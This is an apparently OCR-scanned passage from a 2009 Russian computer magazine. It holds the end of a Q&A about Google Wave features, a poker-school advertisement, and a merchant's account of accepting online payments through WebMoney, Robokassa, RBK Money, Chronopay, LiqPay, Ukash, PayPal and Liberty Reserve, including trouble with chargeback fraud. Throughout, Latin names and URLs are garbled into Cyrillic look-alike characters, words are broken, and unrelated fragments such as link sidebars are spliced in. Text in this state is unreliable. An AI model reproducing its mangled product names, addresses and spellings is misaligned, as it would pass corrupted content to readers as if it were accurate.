на эти волны у тебя оформлена подписка, и это сделано 
автоматически (можно сделать и вручную, выбрав в панели 
управления волнами кнопку Роііоѵѵ]. Чтобы избавиться от 
волны (в том числе, собственноручно созданной], нужно от 
нее отписаться — для этого, соответственно, есть кнопка 
ипіоііоѵѵ. 

0: КАКИЕ ЕЩЕ МОДИФИКАТОРЫ ПОИСКА ЕСТЬ, 
ПОМИМО ѴѴІТН:РІ)ВиС? 

Аі Как я уже говорил, любые поисковые запросы можно 
сохранить. Рекомендую, помимо «ѵѵіТЬщиЫіс Іад :ги» и 
« і п : і п Ьох То:<уои>йдоодІе\л/аѵе.сот», записать также: 

• «опіуіоіте із:ипгеасі». В ответ на этот запрос Соодіе ѴѴаѵе 
покажет волны, которые должны волновать тебя в первую 
очередь: они адресованы тебе (и никому другому) и при 
этом не прочитаны. Считай, что это письмо, отправленное 
на твой адрес. 

• «сгеаіопте -І5:по*е». Как посмотреть все волны, которые 
ты создал и добавил в них участников? С помощью моди- 
фикатора «сгеаіопте» мы оставляем волны, созданные 
нами. «із:поІе» означает, что волна является заметкой, так 
как участники не добавлены — убираем их, добавив п еред 
модификатором минус. В результате получаем своеобраз- 
ный аналог из почтового клиента — папку «Исходящие». 
Еще небольшой хинт. В момент сохранения поискового 
запроса можно указать для каждого из них свой цвет, выбрав 
в выпадающем меню пунет«5еІ соіог». Полный аналог 
БаЬеІ'ов из Стаіі'а. 
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СПИСОК КОНТАКТОВ: ЧАСТЬ ПОДГРУЖЕНА 
АВТОМАТИЧЕСКИ ИЗ ОМАН. 



0: ТЫ ГОВОРИЛ, НТО В ТЕКСТ МОЖНО ВСТАВИТЬ 
КАКИЕ-ТО РАСШИРЕНИЯ. МОЖНО ПОДРОБНЕЕ? 

Аі Соодіе ѴѴаѵе поддерживает два основных вида расши- 
рений. Первый из них — гаджеты (Сасідеіз]. Это интерак- 
тивные элементы, представляющие новые возможности 
взаимодействия, которые пользователи могут вставить 
прямо в волну. Самое простое, но одновременно и часто 
используемое расширение для ѴѴаѵе — гаджет «Ѵез/Ыо/ 
МауЬе». Его смысл достаточно прост: участникам волны 
задается вопрос, на который они могут ответить «Да/Нет/ 
Может быть»: дополнение принимает ответы и аккумули- 
рует результаты опроса. Еще один стандартный гаджет — 
карта, которая использует АРІ Соодіе Марз и позволяет 
прямо в волне указать географическое место или маршрут. 
Оба дополнения доступны по умолчанию из панели инстру- 
ментов во время редактирования волны. Но недаром 
Соодіе проводит бета-тестирование, а прежде всего, чтобы 
привлечь различных разработчиков. В результате уже 
сейчас существует немало расширений от сторонних коде- 
ров. Такой аддон можно добавить в волну, указав его 1Э РБ. 
Впрочем, это не самый удобный вариант: если в навигаци- 
онной панели выбрать раздел СеШпдз, то там ты найдешь 
волну Ехіепбоп ЗеШпдз, через которую приложения можно 
установить — в таком случае они появятся в тулбаре. Из 
представленных аддонов особенно рекомендую Ѵісіео Сбаі 
Ехрегіепсе и Сопіегепсе, позволяющие прямо в волне 
организовать видео- или аудио-конференцию. 
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УСТАНОВКА РАСШИРЕНИЙ 



0: А НТО НАСЧЕТ ВТОРОГО ТИПА 
АДДОНОВ? 

А: Другой вид расширений — роботы (РоЬоііз] — 
больше походят на ІВС-ботов. Что они делают? 
Да все то же самое, что мог быть делать чело- 
век, но выполняют это автоматически. Робота 
можно использовать ДЛЯ: 

• изменений информации в волне; 

• взаимодействий с участниками в волне; 

• синхронизации и передачи информации из 
волны вовне и в другие ВОЛНЫ; 

• доступа и изменения состояния стороннего 
продукта (например, базы данных]. 

ХМРР ЫТе ВоТ — один из самых известных 
ботов, который обещает выручить тебя, если 
ты всерьез возьмешься использовать Соодіе 
ѴѴаѵе, а твой ІпЬох будет постоянно обновлять- 
ся новыми волнами. Его задача — напомнить 
тебе об произошедших изменениях, используя 
для оповещения ХМРР-протокол, то есть сооб- 
щения через ^ЬЬег. Чтобы использовать его 
расширения, добавь бота сначала в контакты 
Соодіе ѴѴаѵе (его Ю — ѵѵаѵе-хтррйаррзроЕ 
сот], а затем в записную книжку Соодіе Таік. 
Теперь, добавив бота ктем волнам, за кото- 
рыми ты желаешь следить, будешь получать 
уведомления об обновлениях в СТаІк. 

0: ХОНУ НАПИСАТЬ РАСШИРЕНИЕ 
ДЛЯ 6006І.Е ѴѴАѴЕЗ. ЧТО ДЛЯ ЭТОГО 
НУЖНО? 

А: Увы, в рамках одной статьи уместить даже 
мини-урок по созданию своего гаджета или 
робота не получится. Для разработки роботов 
Соодіе ѴѴаѵе необходима соответствующая 
клиентская библиотека, которая существует 
сейчас для 5аѵа и Руібоп. Причем робо- 
та обязательно нужно захостить на Соодіе 
Арр Епдіпе, масштабируемой среде веб- 
приложений. Далее пользователь добавляет 




60061-Е ѴѴАѴЕ — ЗАМЕНА Е-МАИ? 

в волну робота, за которым следует ѲаррзроЕ 
сот — так же, как и другого участника, то есть 
с помощью идентификатора приложения Арр 
Епдіпе. Например, если идентификатор при- 
ложения Арр Епдіпе для робота — хакербоі, то 
адрес участника волны для него — хакербоШ 
аррзроЕсот. И робот работает :]. 

Что касается гаджета, изнутри он представляет 
собой ХМЕ-файл, в котором приводится описа- 
ние и логика работы. Его не надо хостить на Арр 
Епдіпе, но он должен быть размещен на хостин- 
ге. Ссылки для более подробного изучения 
доступны в боковой врезке. 

0: РАЗ УЖ МЫ ЗАГОВОРИЛИ О ТЕХНИ- 
ЧЕСКОЙ СТОРОНЕ ВОПРОСА, СКАЖИ, 

ЧТО С ПОДДЕРЖКОЙ БРАУЗЕРОВ? 
ПОПРОБОВАЛ ОТКРЫТЬ СЕРВИС 
В ОРЕРА - РАБОТАЕТ ЧЕРЕЗ ПЕНЬ 
КОЛОДУ. 

А] Это вполне объяснимо. На текущий момент 
поддерживаются только Соодіе СЬготе, Заіагі 
4, Еігеіох 3.5; другие варианты исключены. А 
для работы некоторых функций, в том числе 
для аттача к волнам файлов необходима 
установка Соодіе Сеагз ( деагз.доодіе.сот ]. 

В СЬготе «шестеренки» уже включены, а в 
Еігеіох помимо них рекомендую установить 
любопытное расширение Соодіе ѴѴаѵе ІМоШіег 
( ИтаІ 5 тіІб.сот/ 2009 / 1 0 /доодІе-ѵѵаѵе-абб- 
оп-Іог-ЕгеІох ]. Аддон проверяет аккаунт на 
наличие непрочитанных сообщений в волнах 
с заданным интервалом, позволяя быстро к 
ним перейти. 

0: МОЖНО ЛИ ИСПОЛЬЗОВАТЬ Б00Б1.Е 
ѴѴАѴЕ НЕ В БРАУЗЕРЕ? ДЛЯ ТВИТТЕРА 
ЖЕ ЕСТЬ КЛИЕНТЫ ПОД РАЗНЫЕ ПЛАТ- 
ФОРМЫ? 

Аі Тут надо понимать, что твиттер — сервис 
постарше. Пока не разработано полноцен- 
ное АРІ для доступа к Соодіе ѴѴаѵе, ждать 
какого-либо толкового клиента рано. С 
другой стороны, если тебе не нравится обра- 
щаться к волнам через вкладку браузера, 
то уже есть отдельное приложение, напи- 
санное на АбоЬе АІР (а потому работающее 
под всеми платформами]. ѴѴаѵег отображает 



колонку с волнами, откуда ты в любое время 
можешь читать, писать и просто наблюдать 
за тем, что происходит в инбоксе твоего 
Соодіе ѴѴаѵе аккаунта. К тому же, не стоит 
забыть, что возможность сделать зіапбаіопе- 
приложение есть прямо в браузере Соодіе 
СЬготе (меню «Управление текущей страни- 
цей «Создать ярлыки приложений»]. На 
данном этапе развития сервиса, это, пожа- 
луй, лучший вариант. 

0: ТАК, А КАКАЯ СТАДИЯ РАЗВИТИЯ? 
ЧТО ПОЛУЧИЛОСЬ У ГУГЛА: РЕАЛЬНО 
КРУТОЙ СЕРВИС ИЛИ УНЫЛЫЙ СЛИВ? 

Аі Задача, на которую замахнулся Гугл, 
звучит очень просто — заменить электрон- 
ную почту новой системой под названием 
ѴѴаѵе. Вопрос, от которого пляшет компания: 
«Какой была бы электронная почта, если 
бы ее изобретали сегодня?» Бренд Гугла 
помог раскрутить и даже порой помешать 
людей на этой теме. Но неужели Соодіе уже 
удалось изобрести замену традиционной 
почте? Явно нет! Ну, скажи: тянет ли на 
такую роль сервис, который пока досту- 
пен лишь избранным, а работает всего в 
нескольких браузерах? Еще хуже — чего я 
совсем не ожидал от Соодіе — сервис ино- 
гда тормозит! На мощном железе, широком 
канале и родном браузере Соодіе СЬготе. 
Конечно, это можно простить: в конце кон- 
цов, идет закрытое бета-тестирование. Но, 
извини, и на альтернативу почте замахи- 
ваться пока рано. Пускай, Соодіе и собира- 
ется выпустить весь код и документацию в 
открытый доступ, и даже частично это сде- 
лал. В планах — превратить веб-сервис в 
набор стандартов, чтобы каждый мог в слу- 
чае необходимости установить ѴѴаѵе-сервер 
у себя и связать их с другими. Но вот, когда 
удастся этот стандарт распространить до 
размахов нынешней электронной почты — 
тогда и поговорим. А сейчас это многообе- 
щающий концепт, который неплохо можно 
приспособить для совместной работы и 
общения внутри своей продвинутой тусовки. 
Но и то, скорее, ради того, чтобы просто 
быть в теме. ~н~ 



ХАКЕР 12 /132/ 09 



► ОЗЗ 




Книги расскажут 
всё о стратегиях. 






НО КНИГИ НЕ ИГРАЮТ В ПОКЕР 






РШ.І. 



УЧИТЕСЬ, общайтесь и играйте с профи 
ѴѴѴѴѴѴ.Р иНТИТРОКЕР.МЕТ 



Сайт обучающий, без игрі 




I НАТАЛИЯ МАЛЫШЕВА N АІ.Ѵ5Н КАИбМАІ ШСОМ 



НАЛАЖИВА 

СИСТЕМУ ПРИЕМА 
ПЛАТЕЖЕЙ 



8 СПОСОБОВ ПРИНИМАТЬ 



ОПЛАТУ С КЛИЕНТОВ В ИНЕТЕ 



ВОПРОС ПРИЕМА ОПЛАТЫ ЗА УСЛУГИ ИЛИ ТОВАР ВСТАЕТ ПЕРЕД КАЖДЫМ, КТО СОБИРАЕТСЯ 
СОЗДАТЬ СВОЙ БИЗНЕС В ИНЕТЕ. ПРИ КАЖУЩЕЙСЯ СЛОЖНОСТИ НАЛАДИТЬ СИСТЕМУ ДЛЯ 
ПРИЕМА ПЛАТЕЖЕЙ НЕСЛОЖНО, ПРИЧЕМ МОЖНО НЕ ОГРАНИЧИВАТЬ СЕБЯ ОДНИМИ ЛИШЬ 
ЭЛЕКТРОННЫМИ ДЕНЬГАМИ, А ПРИНИМАТЬ К ОПЛАТЕ И ОБЫЧНЫЕ КРЕДИТНЫЕ КАРТОЧКИ. 
ВАЖНЫМ ЭТАПОМ ЯВЛЯЕТСЯ ВЫБОР ПАРТНЕРОВ ДЛЯ СОТРУДНИЧЕСТВА, ОПЫТОМ РАБОТЫ С 
КОТОРЫМ Я И СПЕШУ ПОДЕЛИТЬСЯ. 



И так, я — менеджер финансового 
звена компании Теіесотах ІТсІ. 
Компания занимается покупкой 
и продажей голосового трафика, 
написанием программного обе- 
спечения для работы с голосом, интеграцией 
и объединением различных голосовых сетей и 
провайдеров, кактрадиционных.таки 5куре/ 
Ооодіе Таік. Особым спросом пользуются сим- 
карты альтернативного роуминга ОЗМ-ІтаѵеІ, 
^ѵа -приложение для мобильного теле- 
фона, магазин телефонных номеров со всех 
континентов, виртуальный офис. Специфика 
тутвтом, что, приобретая услугу, клиентзатем 
вноситабонентскую плату, периодически по- 
полняет баланс и активирует дополнительные 
сервисы. Клиенты очень разные — от мелких 
интернет-магазинов дозаводов и крупных 
корпораций. Перед нашим отделом стояла 



задача раз работать та кую систему приема 
платежей, которая была бы удобна любому 
пользователю. Ниже хочу поделиться стобой 
тем, как мы поднимали систему, с кем работали 
и с какими проблемами сталкивались. О каж- 
дой платежной системе по порядку! 

ѴѴЕВМОШ 

Одной из наиболее популярных и простых в 
использовании платежных систем является 
ѴѴеЬтопеу. Поэтому нет ничего удивитель- 
ного в том, что подключали мы ее первой. 
Система рассчитана и на продвинутых поль- 
зователей, и на людей, далеких от инфор- 
мационных технологий, а именно это нам и 
было нужно. Для клиентов доступна как дес- 
ктопная версия приложения (небезызвестный 
ѴѴеЬтопеу Кеерег], так и онлайн-клиент. 
Причем для оплаты услуг клиенту необяза- 



тельно даже наличие постоянного кошелька 
(они распределяются по валютам: рубли — 
ѴѴМ Р, долларовый ѴѴМ2 и т.д.], без проблем 
можно совершить покупку, воспользовав- 
шись карточками оплаты ѴѴеЬтопеу, широко 
доступными в разных магазинах и киосках, а 
также чеками Раутег. 

Процесс подключения магазина к платеж- 
ной системе не занимает много времени. 
Буквально за пятнадцать минут мы завели 
ѴѴМ-кошелек, еще некоторое время ушло 
на установку ѴѴеЬтопеу Кеерег и получение 
аттестата продавца. В целях безопасности 
каждый пользователь ѴѴеЬтопеу должен про- 
ходить аттестацию. Чем надежнее аттестат он 
хочет получить, тем больше проверок нужно 
пройти, но и тем больше операций он может 
выполнять с системой. Для того чтобы иметь 
возможность принимать платежи, необхо- 
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димо получить аттестат продавца. А дальше 
— дело техники. Интегрируем в платежные 
скрипты возможность оплаты через вебмани, 
реализовав ее через соответствующие АРІ - 
вызовы платежной системы, и без проблем 
принимаем оплату прямиком в свой кошелек. 
Вот некоторые преимущества системы: 

• моментальная оплата; 

• моментальная конвертация из одной валю- 
ты в другую; 

• комиссия на перевод внутри системы 
составляет всего лишь 0.8% от суммы тран- 
закции; 

• вывод в реальные деньги: на кредитную 
карту, на банковский счет (сервис ѴѴіге 
ЕхсЬапдег). 

Что ж, теперь, основной для рунета сервис 
для приема платежей подключен. Охватив, 
тем самым, несколько миллионов пользова- 
телей, можно задуматься и о приеме другой 
электронной валюты. 

ЯНДЕКС.ДЕНЬГИ, МОЫЕУМАИ ЕА5УРАѴ 

С этими платежными системами получилось 
еще проще. Вместо того, чтобы осваивать 
интерфейсы для подключения каждой платеж- 
ной системы, заключать договора, заниматься 
оформлением бухгалтерской документации, мы 
воспользовались одним единственным серви- 
сом — онлайн-обменником электронных валют 
ВОВОХсбапде. Ценою небольшого процента с 
транзакций, взимаемого за услуги посредника, 
сервис избавил нас от необходимости заво- 
дить аккаунты на Яндекс.Деньги, МопеуМаіІ, 
ЕазуРау. Система реализована очень удобно: 
клиент радуется моментальной оплате услуг, 
а мы — деньгам, которые, пройдя через 
РОВОХсбапде, попадают непосредственно на 
наш ѴѴМ-кошелек. Минус, пожалуй, один — 
сравнительно высокая комиссия «Робокса»: 
это 8% удерживаемой с суммы транзакции. 



Впрочем, процент уже не кажется таким 
серьезным, когда осознаешь, сколько времени 
и сил ушло бы на подключение каждой из 
систем в отдельности. Скажу больше! Чтобы 
работать с платежными системами напрямую, 
нужно, к тому же, удовлетворять требованиям, 
которые они предъявляют к продавцу — начи- 
ная от чисто технических, выражающихся в 
конкретных характеристиках хостинга, и закан- 
чивая финансовыми, серьезно ограничиваю- 
щими возможность работы небольшим пред- 
приятиям. Например, для приема Яндекс.Денег 
(при работе с системой напрямую] ожидаемые 
объемы продаж магазина должны составлять 
не менее 10 000 рублей в месяц. Словом, мы 
свой выбор сделали в пользу ВОВОХсЬапде 
и решили потратить освободившееся время 
на подключение относительно новой, но уже 
достаточно зрелой платежной системы. 

РВК М(МЕѴ 

ВВК Мопеу — электронный кошелек, позво- 
ляющий принимать платежи почти 30 спо- 
собами. Сформировав счет, клиент может 
внести платеж с помощью систем денежных 
переводов «Юнистрим» или СОІЧТАСТ, в 
различных сетях терминалов моментальной 
оплаты, банковским переводом, кредитной 
картой и много как еще. Подключив одну 
эту систему, мы сразу охватили клиентов, у 
которых нет электронных кошельков и кре- 
дитных карт. Правда, отсюда последовал 
и недостаток: некоторые виды платежей 
зачисляются с задержкой до 8 банковских 
дней. В частности, мы настоятельно не реко- 
мендуем вносить оплату через «Сбербанк». 
Во-первых, придется заполнять много бума- 
жек, во-вторых, деньги от покупателя к про- 
давцу идут порядка двух недель, что очень и 
очень долго. 

Так или иначе, подключить систему ПВК 
Мопеу явно не будет лишним — ведь как 
иначе предоставить клиенту самые разные 
варианты оплаты, в том числе и переводом 
на банковский счет? Система работает с низ- 




ФОРМАДЛЯ ПОДКЛЮЧЕНИЯ 
КВКМОЫЕѴ 



кой комиссией за перевод (от 1%] и радует 
адекватной службой поддержки. А дочер- 
нее предприятие известного холдинга РБК 
вызывает уважение и доверие у клиента. 

СНРОМРАѴ 

Следующим вопросом на пути организации 
электронного бизнеса стал прием оплаты 
с кредитных карт. Этот аспект электронно- 
го бизнеса оказался довольно сложным и 
поучительным, поэтому на нем хочется оста- 
новиться подробнее. 

На рынке существуют компании, которые 
активно предлагают себя в качестве посред- 
ников в открытии так называемого Мегсбапі: 
ассоипі: с возможностью принимать платежи 
пластиковыми карточками. На одном из 
семинаров интернет-магазинов мы познако- 
мились с представителями небезызвестной 
компании СЬгопорау. Не знаю, как насчет 
родительской компании из Нидерландов 
с таким названием, а вот опыт общения с 
«российским дитем» оказался, мягко говоря, 
удручающим. 

Процесс заключения договора был мучи- 
тельным и долгим. Каждый день появля- 
лось новое микро-требование со стороны 
«Хронопея»: то необходимо было поставить 
баннеры Ѵіза и Мазіегсагсі на сайт, то доба- 
вить «Неіигп Роіісу» и «Соглашение об 
использовании». Это не было сверхзадачей, 
но можно было эти требования изложить 
сразу вместе с остальными формами, а не 
выдавливать, как глубоко секретную инфор- 
мацию под пытками. Эпопея закончились 
только через три месяца: был подписан 
договор, и мы получили документацию по 
подключению. 

Первым, кто засомневался в адекватности 
наших новых партнеров, оказался наш про- 
граммист: «Такое впечатление, что интерфейс 
для работы писал школьник». Тем не менее, 
система оказалось рабочей: мы стали при- 
нимать платежи по кредитным картам, а 
клиенты радовались новому и удобному для 
многих способу оплатить наши услуги. Со 
временем оплат стало значительно больше, и 
здесь стали появляться проблемы. Согласно 
контракту с сервисом, выплаты «Хронопея» 
должны были осуществляться каждые две 
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• Раутег: 
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• РОВОХсЬапде: 
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• РВК Мопеу: 
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• СЬгопорау: 
сЬгопорау.сот 
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[іЬегІугезегѵе.сот . 

• Хгаіез: 
хгаіез.ги . 

• СазЬег: 
сазЬегги. 



недели. Но когда подошло время, оказалось, что тут как 
раз не все так хорошо. Договорные сроки постоянно 
нарушались, суммы всячески занижались, а общение 
с менеджерами сервиса превращалось в невразуми- 
тельный и нервозный флейм. Но то была еще прелюдия. 
Через пару месяцев мы получили первое грозное сообще- 
ние сбагдеЬаск. 

В случае если покупатель обнаруживает в своей выписке 
списание средств, которое было совершено не по его ини- 
циативе (мошенническая операция), то он вправе подать 
жалобу в банк. Банк, в свою очередь, проводит расследо- 
вание и принимает решение: возвращать клиенту деньги 
или нет. Такой возврат денег называется сбагдеЬаск. Что 
означает это для продавца? В случае чарджбека продавец 
теряет проданный товар или услугу, средства по платежу, 
комиссию, которая была уплачена за обслуживание плате- 
жа, комиссию за конвертацию валюты (если платеж совер- 
шался в валюте, отличной от валюты торгового счета), а 
также штраф, уплачиваемый продавцом банку в случае 
каждого чарджбека (до $50). Комментарии излишни. 

Само собой мы сразу начали выяснять, в чем причина 
этого чарджбека. Оказалось, что клиент якобы не получил 
услугу за свою оплату. Но, черт подери, мы-то продаем 
телекоммуникационные услуги. Биллинговая система 
фиксирует все действия клиента: что купил, когда и 
сколько времени пользовался. Все логи и скриншоты мы 
отправляем в СЬгопорау. Вежливый менеджер подбадри- 
вает нас, что клиентом оказался мошенник и, благодаря 
нам, они смогут вывести его на чистую воду, но... деньги 
клиента с нас списаны и вдобавок нам впарен штраф $30. 
Не самый удачный расклад. 

Проходит время, и чарджбеки начинают появляться все 
чаще. Разбирательство по каждому из них чисто фор- 
мальное, чаще всего не в нашу пользу. Когда штрафы 
начинают перекрывать прибыль, мы понимаем, что так 
называемые рисковые платежи легко отследить самим. 
Проверив через ѵѵбоіз ІР-адрес первого мошенника, 
выяснилось, что платил он с американской кредитной 
карты из солнечной страны Нигерии — даже прокси не 
использовал. «Хронопей» благополучно не заметил этого 
крохотного, но существенного факта и пропустил дивный 
платеж, и это нормальная практика! Но, к сожалению, 



все это мы выяснили много позднее, когда чарджбеки 
посыпались один за другим. И в основном платили из 
Румынии, Нигерии, Кот-д'Ивуара и подобных стран с аме- 
риканских и немецких карт. «Хронопей» не обращает на 
это внимания. Вероятно, не в силу низкой квалификации, 
а в силу неуемного желания заработать на доверчивом 
клиенте. В данном случае — интернет-магазине. 

Тут есть одна хитрость. Если платеж вернуть клиенту 
добровольно, то штрафа и пятна на репутации компании 
в виде сбагдеЬаск можно избежать. Такая операция 
называется РеіюпсІ и подразумевает возврат средств со 
счета продавца на счет покупателя, который инициирован 
самим продавцом. В этом случае банк или процессинг 
не участвует в разрешении споров между продавцом и 
покупателем, они договариваются между собой сами. 
Продавец сам принимает решение о рефанде: в этом слу- 
чае он не платит штрафов в банк, но теряет комиссию за 
перевод и конвертацию. Чтобы как-то разрешить ситуа- 
цию с чарджбеками, мы создали свой отдел процессинга. 
Подход был прост: все рискованные платежи мы возвра- 
щаем сами и не обслуживаем по этому платежу клиента. 
Тут-то и разволновался «Хронопей». Менеджер сразу 
перестал быть приторно вежливым, а стал угрюмым и 
холодным. Когда в течение месяца не стало ни одного 
чарджбека, мы получили письмо о том, что «Хронопей» 
разрывает с нами контракт. Становится ясна нехитрая 
стратегия подобных финансовых посредников. Привлекая 
в оборот средства клиента и всячески уклоняясь от 
выплат, менеджеры «Хронопея» свою сверхзадачу посчи- 
тали выполненной. Им просто выгодно зарабатывать на 
мошеннических операциях. 

К счастью, появилась альтернатива подобной системе. 

ЫОРАѴ 

Относительно недавно украинский «Приватбанк» внедрил 
систему ицРАУ для авторизации кредитных карт, которая 
имеет несколько принципиальных отличий от других 
мерчантов. Процедура оплаты состоит из нескольких 
частей. Сначала клиент вводит данные кредитной карты, 
затем номер своего мобильного телефона. На мобильный 
приходит 5ПП5 с единоразовым кодом. Этот код следует 
ввести в соответствующее поле. Если платеж успеш- 
ный, ему присваивается статус «проверяется»: такая 
проверка занимает от 5 минут до 12 часов. Как только 
платеж проверен и проведен, деньги поступают на счет 
интернет-магазина, без какого-либо холда — задержки, 
при которой процессинговая компания зачисляет деньги 
на внутренний счет, но вам не отдает. 

Выводить деньги со счета ицРАУ на кредитную карту 
можно хоть каждый день. Комиссия на вывод небольшая: 

• счет УцРАУ карта «Приватбанка» — 0.55$+0.5%; 

• счет ицРАУ карта другого банка — 1.95$+1.0%. 

При этом подключить прием платежей через БідРАУ — раз 
плюнуть. На освоение АРІ и внедрение в нашу платежную 
систему нужных вызовов ушло 3-4 часа. Причем суппорт 
работает очень оперативно: можно писать в 2 ночи и быть 
уверенным, что тебе ответят. Тут, правда, вопрос в другом: 
как на него ответят! Сказывается большая текучка кадров в 
службе поддержки, а поэтому квалифицированный ответ за 
время нашего сотрудничества удавалось получить не всегда. 
Что касается ситуации с чарджбеками, то по сравнению с 
СЬгопорау — это небо и земля. Б і ц РАУ всегда на стороне 
продавца. Чарджбеки можно оспаривать и вполне успеш- 
но. Также у них круглосуточный чат службы поддержки. 

Это удобно как для плательщика, так и для интернет- 
магазина: все проблемы можно быстро разрешить. 



► 038 
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ДЛЯ ОПЛАТЫ ЧЕРЕЗ 1ЖА5Н 
ПРИОБРЕТАЕТСЯ ВАУЧЕР 



Впрочем, при всех плюсах есть и неудобства. 
Так, иногда срок проверки некоторых пла- 
тежей доходит до 10 дней, что, конечно, не 
прибавляет довольства клиентов. Следующий 
нюанс заключается в том, что ЫцРАѴ не при- 
нимает платеж, если ІР-адрес плательщика 
и страна выдачи кредитной карты не совпа- 
дают. Это повышает безопасность, но порой 
лишает реальных владельцев карт возмож- 
ности воспользоваться системой. Бывает, что 
5М5 не приходит; тогда нужно обращаться в 
службу поддержки: те перезагружают 5М5- 
шлюз и все начинает работать. Проблема 
в том, что не все клиенты будут тщательно 
добиваться оплаты, а просто уйдут к конку- 
рентам. Уверена, что неудобства связаны с 
пока еще несовершенством молодой систе- 
мы, однако такие «детские болезни» ограни- 
чивают желание переводить на нее ресурсы с 
высоким оборотом. Еще одна важная деталь 
— ЫцРАУ подходит, в основном, для про- 
цессинга карт русскоговорящей аудитории. 
Западные клиенты ее побаиваются. 

Отработав схему продаж на русскоговоря- 
щем сегменте рынка, мы решили уверенным 
шагом направить луч маркетинга на запад. К 
сожалению, наши англо-, немецко- и китай- 
скоговорящие братья и сестры не пользуются 
вебмани, не знают, что такое «Яндекс» и где 
находится главное отделение «Сбербанка». 

ІІКА5Н 

Посовещавшись, решили начать с бри- 
танской платежной системы ІІказЬ. Это 
ваучеры, которые можно приобрести в раз- 
личных сетях терминалов по всей Европе. 
Подключение к системе заняло около 2 
недель. К нам был прикреплен менеджер, 
который вежливо и грамотно отвечал на все 
вопросы. Главный плюс для клиента — это, 
конечно же, удобство. За наличные тот при- 
обретает ваучер, затем вводится цифровой 
код в соответствующее поле — и все, покупка 
совершена. Если ваучер номиналом больше, 
чем сумма покупки, автоматически выдается 
ваучер на сумму сдачи. При необходимости 
ваучеры можно объединять и делить. 

Если на аккаунте продавца скапливается 
сумма более $500 — средства можно вывести 
на банковский счет. Тут важно, что ЭказЬ 
работает только с юридическими лицами. 
Среди минусов — довольно высокий про- 
цент, который удерживается с суммы платежа 
(8%). Нас как продавца ІІказЬ обрадовал 
возможностью бесплатно разместить свой 



баннер у них на сайте. Но система оказалась 
еще недостаточно распространена, поэтому 
транзакций с нее значительно меньше, чем 
ожидалось. Правда, надежда, что в скором 
времени она получит должное признание, 
есть :). 



РАУРАІ. 

А вот у кого нет проблем с популярностью, 
так это у РауРаІ. Родственные отношения с 
ведущим интернет-аукционом ЕЬау, процес- 
синг многих видов кредитных карт и большой 
рекламный бюджет помогают этой системе 
завоевывать новых клиентов. Но перед тем 
как подключить к ней свой магазин, нужно 
обязательно иметь в виду следующее: РаураІ 
— слабо защищенная система. Фактически, 
подобрав пароль к аккаунту, мошенник 
может распорядиться банковскими счета- 
ми или кредитной картой, привязанной к 
счету. Конечно, нужно учитывать триггеры, 
на которые срабатывает достаточно про- 
двинутая антифрод система: например, на 
часто меняющийся ІР-адрес из разных стран. 
Мошенники имеют конкретные схемы и ста- 
раются быстро потратить деньги, покупая в 
интернет-магазинах всевозможные товары и 
услуги. Интернет-магазины, получив деньги, 
отправляют товары или предоставляют услуги 
на сумму транзакции. Но РауРаІ — система 
возвратная. Как только владелец аккаунта 
обнаруживает несанкционированную тран- 
закцию и выставляет претензию, РауРаІ 
возвращает деньги с аккаунта продавца и, 
в результате, интернет-магазин в этой цепи 
становится жертвой. У многих компаний 
число рисковых платежей доходит до 20%. 
Надо отметить, что и РауРаІ со своей сто- 
роны не горит желанием завоевать необъ- 
ятные просторы русскоговорящей аудитории. 
Россия, Украина вообще не входят в список 
стран, с которыми РауРаІ работает. Вернее 
работает, но только в одну сторону. Платить 
можно, а получать деньги нельзя. 

УВЕИТУ РЕ8ЕКѴЕ 

Среди клиентов обязательно есть группа 
людей, которые хотели бы остаться ано- 
нимными. Мы уважаем право клиента не 
афишировать персональную информацию, 
если он приобретает у нас туристическую 
сим-карту или виртуальный телефонный 
номер для своей оффшорной компании 
на Кипре. Естественно, когда клиент вво- 
дит данные кредитной карты, оставаться 
инкогнито невозможно. ѴѴеЬтопеу не имеет 
представительских отделений во многих 
странах Азии, Африки, Латинской Америки, 
поэтому использовать ее в этих целях может 
быть затруднительно. Зато есть платежные 
системы, позволяющие принимать аноним- 
ные платежи. Мы остановили свой выбор 
на ЫЬег1;у гезегѵе. Скажем прямо, сомнений 
в отношении этой системы много. Но то, 
насколько у компании все сделано про- 
фессионально, нас подкупило. Чего стоит 




многоступенчатая система защиты — одна 
из лучших из того, с чем нам приходилось 
работать. 

Спорный момент заключается в том, каким 
образом и с кого получить деньги, если вдруг 
система перестанет существовать. Поэтому 
большие суммы денег на ЬіЬегІу гезегѵе 
мы стараемся не аккумулировать и поско- 
рее выводить в доверенную валюту. То, как 
вывести деньги из системы — отдельный 
вопрос. Если из ѴѴеЬтопеу, ВВК Мопеу или 
ЫцРАУ денежные средства можно вывести на 
банковский счет, то в ЫЬег1;у такой возмож- 
ности нет. ѴѴеЬтопеу официально заявила, 
что платежные средства из других систем 
менять с ѴѴеЬтопеу нельзя под страхом 
блокирования счета. Пожалуй, здесь и начи- 
наются пируэты финансового менеджмента. 
Как виртуальные средства превратить в 
реальные без особых рисков и потерь? Путь 
воина — всевозможные обменные пункты в 
интернете. На данный момент мы используем 
сервис хгаіез, помогающий найти наиболее 
выгодные предложения по обмену. В отличие 
от многих других, хгаіез представляет отзывы 
пользователей и отображает рейтинг обмен- 
ных пунктов, что хоть немного позволяет ори- 
ентироваться в море предложений по обмену. 
Неплохим вариантом также является биржа 
сазЬег. Если внимательно относиться к про- 
цессу обмена и выбора партнера, читая отзы- 
вы и учитывая рейтинг, все заканчивается 
успешно. Встречаются, конечно, индивиды- 
мошенники, которые набивают взаимные 
рейтинги с себе подобными. Но, как правило, 
это легко можно отследить по датам реги- 
страции и обменных операций. 




ЗАКЛЮЧЕНИЕ 

Как ты заметил, вариантов приема пла- 
тежей очень много. У всех есть сильные 
и слабые стороны. Я намеренно в этом 
обзоре не касалась стандартного вари- 
анта — банковского перевода по счету. 
Конечно, этот вариант нами предусмотрен. 
Стандартный банковский платеж (или ѴѴіге 
Тгапзіег] — основное средство расчетов 
с юридическими лицами. Но комиссии 
некоторых банков доходят до 50 долларов 
за транзакцию, и при небольших платежах 
совершать покупку становится просто эко- 
номически нецелесообразно. В сравнении 
с такой комиссией 0.8% за транзакцию 
в системе ѴѴеЬтопеу выглядит гораздо- 
гораздо привлекательней. 

Чтобы начать вести бизнес в инете, вовсе 
необязательно подключать сразу все системы 
для приема платежей. Вполне достаточно 
одной-двух, но максимально удобных для 
той аудитории, которая будет пользоваться 
предлагаемыми услугами или приобретать 
товар. А уже со временем, учитывая отзывы и 
предложения, можно дополнительно вводить 
востребованные варианты для приема плате- 
жей. Ничего сверхъестественного здесь нет, а 
потому начать дело может каждый. □с 
